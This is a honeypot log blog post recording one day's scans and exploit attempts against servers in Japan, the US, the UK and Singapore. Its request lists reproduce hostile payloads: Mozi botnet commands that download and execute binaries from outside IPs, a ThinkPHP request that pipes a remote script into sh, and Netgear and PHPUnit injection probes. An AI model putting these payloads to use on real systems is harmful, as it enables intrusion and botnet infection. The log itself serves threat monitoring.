コンニチハレバレトシタアオゾラ

With nothing better to do, I spend the whole day facing my blog, aimlessly jotting down whatever trifles pass through my mind,

2021/03/14 Honeypot (tentative) observation record

This is the honeypot (tentative) observation record for 2021/03/14.

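Characteristics
Common

Access targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access targeting the PHPUnit vulnerability (CVE-2017-9841)
Access targeting ThinkPHP vulnerabilities
Scanning for Laravel
Scanning for WordPress
Scanning for WordPress plugins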

Location:JP

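Access targeting GPON router vulnerabilities
Scanning by fasthttp
Scanning for .css files
Scanning for .js files
Unauthorized communication involving 110[.]242[.]68[.]4
Access with the UserAgent "Hello, World"
The above were observed.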

Location:US

Scanning by fasthttp
Scanning for Apache Solr
Scanning for Apache Tomcat
Unauthorized communication involving 110[.]242[.]68[.]4
Access with the UserAgent "Hello, world"
The above were observed.

The following access to /shell was observed.

cd /tmp;
rm -rf *;
wget http[:]//39[.]76[.]80[.]40:43887/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:UK

Access targeting GPON router vulnerabilities
Scanning for Apache Solr
Scanning for Apache Tomcat
Unauthorized communication involving 5[.]188[.]210[.]227
Access with the UserAgent "Hello, World"
The above were observed.

Location:SG

Access targeting vulnerabilities in NetGear products
Scanning by aiohttp
Scanning by fasthttp
Scanning by IDBTE4M CODE87
Scanning for Apache Solr
Scanning for Apache Tomcat
Access with the UserAgent "Hello, World"
Access with the UserAgent "Hello, world"
The above were observed.

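Access count trends

JP: Total accesses: 197 (change from previous day: +90)
US: Total accesses: 68 (change from previous day: -101)
UK: Total accesses: 84 (change from previous day: +12)
SG: Total accesses: 111 (change from previous day: +10)

For practical reasons, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.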

Location:JP

Source IP address list

UserAgent list

Count UserAgent
19 -
7 Go-http-client/1.1
1 Hello, World
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
83 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
15 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5
11 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.01717655 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
8 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
16 fasthttp

Request list

Count Method Request Protocol
6 -
1 \x01
2 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
2 CONNECT www[.]so[.]com/:443 HTTP/1.1
2 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
12 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
5 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh sh|HTTP/1.1
1 GET /Content/common/web/CommonActivity.css HTTP/1.1
1 GET /Front/FctPage/Start.aspx HTTP/1.1
1 GET /Home/Bind/binding HTTP/1.1
1 GET /JS/loginstatus.js HTTP/1.1
1 GET /Public/Mobile/ecshe_css/wapmain.css?v=1545408652 HTTP/1.1
1 GET /Public/Wchat/js/cvphp.js HTTP/1.1
1 GET /Public/css/_pk10.css HTTP/1.1
1 GET /Public/home/common/js/index.js HTTP/1.1
1 GET /Public/home/js/fukuang.js HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /admin HTTP/1.1
1 GET /admin_user/consume.php HTTP/1.1
1 GET /ajax/allcoin_a/id/0?t=0.3782499195965951 HTTP/1.1
1 GET /anquan/qgga.asp HTTP/1.1
1 GET /api/content_bottom HTTP/1.1
1 GET /api/currency/quotation_new HTTP/1.1
1 GET /api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1 HTTP/1.1
1 GET /api/site/getInfo.do HTTP/1.1
1 GET /api/uploads/apimap HTTP/1.1
1 GET /api/user/info?&&callback=jsonp_1601457046411_20983 HTTP/1.1
1 GET /api/v/index/queryOfficePage?officeCode=customHomeLink HTTP/1.1
1 GET /assets/dist/static/js/vendor_prod.js HTTP/1.1
1 GET /assets/extension/market/css/mt4.css HTTP/1.1
1 GET /assets/room/css/room_mobile.css HTTP/1.1
1 GET /base/exchange_article/index/classid/1/id/1 HTTP/1.1
1 GET /base/exchange_index/changepwdfirst HTTP/1.1
1 GET /base/goexjs HTTP/1.1
1 GET /check.php HTTP/1.1
1 GET /common/member/js/user.util.js HTTP/1.1
1 GET /common/template/lottery/lecai/css/style.css HTTP/1.1
1 GET /config.php?_=3283&1922563758 HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /cq/kehulistajax.php HTTP/1.1
1 GET /csjs/bankCheck.js HTTP/1.1
1 GET /css/all.css HTTP/1.1
1 GET /css/app.css HTTP/1.1
1 GET /css/info.css HTTP/1.1
1 GET /data/json/config.json HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /ff/css/cssy.css HTTP/1.1
1 GET /getConfig/getArticle.do?code=19 HTTP/1.1
1 GET /getConfig/listPopFrame.do?code=14&position=index&_=1601489645097 HTTP/1.1
1 GET /getLocale HTTP/1.1
1 GET /home/login/login_index.html HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /iframe/rankgiftgotapi/1005 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php/sign HTTP/1.1
1 GET /index.php?m=api&c=app&a=getPlatformConfig HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /index/login/register HTTP/1.1
1 GET /ipl/app/flash/publicbmw/ball/FigLeaf.js?site=member HTTP/1.1
6 GET /jenkins/login HTTP/1.0
1 GET /jiaoyimao/default.css HTTP/1.1
1 GET /js/base1.js HTTP/1.1
1 GET /js/common.js HTTP/1.1
1 GET /js/dianzan.js HTTP/1.1
1 GET /js/json.js HTTP/1.1
1 GET /langConfig.js HTTP/1.1
6 GET /login HTTP/1.0
1 GET /login/img/nyyh/chkjs.js HTTP/1.1
1 GET /m/allticker/1 HTTP/1.1
6 GET /manager/html HTTP/1.1
1 GET /mobile/config.js HTTP/1.1
1 GET /mobile/script/main.m.js HTTP/1.1
1 GET /myConfig.js HTTP/1.1
1 GET /nyyh/game.css HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /public/wap/js/basis.js HTTP/1.1
1 GET /public/web/js/add/com.js HTTP/1.1
1 GET /resources/css/headernav.css HTTP/1.1
1 GET /resources/main/common.js HTTP/1.1
1 GET /room/1002 HTTP/1.1
1 GET /s_api/basic/config_js?callback=__set_config HTTP/1.1
1 GET /s_api/basic/download/info HTTP/1.1
1 GET /skin/js/common.js HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static/css/index.css HTTP/1.1
1 GET /static/data/configjs.js HTTP/1.1
1 GET /static/data/thirdgames.json HTTP/1.1
1 GET /static/guide/ab.css HTTP/1.1
1 GET /static/home/css/css.css HTTP/1.1
1 GET /static/xianyu/js/bankCheck.js HTTP/1.1
1 GET /step1.asp HTTP/1.1
1 GET /style.css HTTP/1.1
1 GET /template/css/login.css HTTP/1.1
1 GET /template/js/comm/Confrim.js HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /user/userlist HTTP/1.1
1 GET /v1/management/tenant/getSpeedDomain HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /views/home/home.js HTTP/1.1
1 GET /web/api/getBanner HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
6 GET /wp-login.php HTTP/1.1
1 GET /ws/index/getTheLotteryInitList HTTP/1.1
1 GET /zz2/address.php?gid=651 HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
2 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
2 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
2 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
2 GET http[:]//www[.]soso[.]com/ HTTP/1.1
2 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
2 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /RPC2 HTTP/1.1
5 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /config HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1

Location:US

Source IP address list

UserAgent list

Count UserAgent
11 -
1 Go-http-client/1.1
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1; rv:60.5.2) Gecko/20100101 Firefox/60.5.2
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36
1 User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705
32 fasthttp

Request list

Count Method Request Protocol
1 \x01
2 \x16\x03\x01
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh sh|HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /jenkins/login HTTP/1.0
1 GET /login HTTP/1.0
2 GET /manager/html HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//39[.]76[.]80[.]40:43887/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /RPC2 HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
2 POST /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//lisalancaster[.]site/5bc94e9d4a97bbf5bb4bba6747440631dbb75ea4d7d78dd4a8d53e30f2b09b2f66d02938621aa897dc622fe7016d9bfbadd9e6780a9f6684c388bc51b93b8d28e9f069ef0228e16bf6b991d3a7208f37330b38f29f03092d0479b25e0570f837 HTTP/1.1
1 POST http[:]//niezwykla[.]website/c0a5d4cef8f92e707b2c85ceb251259b5540ec6f8f4cb27d6726417a85618d41fa36a0f45e2eb6c8eca6f3d87f0cea627d7e580e98ba60d837ed94acd4500edb0aff656871338603dcaaa12339edd6b1af0fbb399d541863e0e991df5f4586ad HTTP/1.1

Location:UK

Source IP address list

UserAgent list

Count UserAgent
11 -
5 Go-http-client/1.1
1 Hello, World
3 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
1 Mozilla/4.01687919 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6 Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
15 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
3 Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02
3 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3

Request list

Count Method Request Protocol
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]so[.]com/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
1 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
5 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh sh|HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
5 GET /jenkins/login HTTP/1.0
5 GET /login HTTP/1.0
5 GET /manager/html HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
5 GET /wp-login.php HTTP/1.1
1 GET http[:]//5[.]188[.]210[.]227/echo.php HTTP/1.1
1 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
5 POST /_ignition/execute-solution HTTP/1.1
9 POST /api/jsonws/expandocolumn/update-column HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
18 POST /zend3/public/ HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:SG

Source IP address list

UserAgent list

Count UserAgent
17 -
3 Go-http-client/1.1
2 Hello, World
1 Hello, world
1 IDBTE4M CODE87
5 Mozilla/5.0 (Linux; Android 10; SM-A102U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2; rv:50.0) Gecko/20100101 Firefox/50.0
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
6 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1 Python/3.6 aiohttp/3.7.3
48 fasthttp

Request list

Count Method Request Protocol
5 \x16\x03\x01\x02
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
3 GET /.env HTTP/1.1
1 GET /0bef HTTP/1.0
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
2 GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=curl+--user-agent+curl_tp5+http[:]//31[.]210[.]20[.]181/ldr.sh sh|HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /elrekt.php HTTP/1.1
1 GET /evox/about HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
2 GET /jenkins/login HTTP/1.0
2 GET /login HTTP/1.0
2 GET /manager/html HTTP/1.1
1 GET /nmaplowercheck1615600848 HTTP/1.1
1 GET /public/index.php HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//103[.]207[.]0[.]134:57440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//202[.]164[.]138[.]8:43027/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /virtualRadar/ HTTP/1.1
1 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET /wp-login.php HTTP/1.1
2 GET http[:]//passport[.]baidu[.]com/ HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
2 POST /GponForm/diag_Form?images/ HTTP/1.1
3 POST /RPC2 HTTP/1.1
2 POST /_ignition/execute-solution HTTP/1.1
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
3 POST /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /sdk HTTP/1.1
3 POST /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
4 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 POST /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//dearth[.]fun/ded6666ab67c53bb0e7f33a76d40ef4a416853d0d4cf5eabeee59425066d6780b3bb7a0a1c175ed53970f777838c1dff5b00712dd75be074707468b039556318471b3f718ca898aa7a09fe4bda91f901d890d50d05d2a904a2ebe584727f9cbb HTTP/1.1
1 POST http[:]//zwykle[.]xyz/fd424817430c5ee55abb4f8cae61e77d71b53e047a687f30a51df9feac7a51dc599fd73d9d85876f8677f62c32d9166bc2448c3e9dd71df9d061e2c28485468e89ce5f9d6759634dd71dc87fdcb3ebe4a3ba5a2077cf0993a9d82587a903f4dc HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf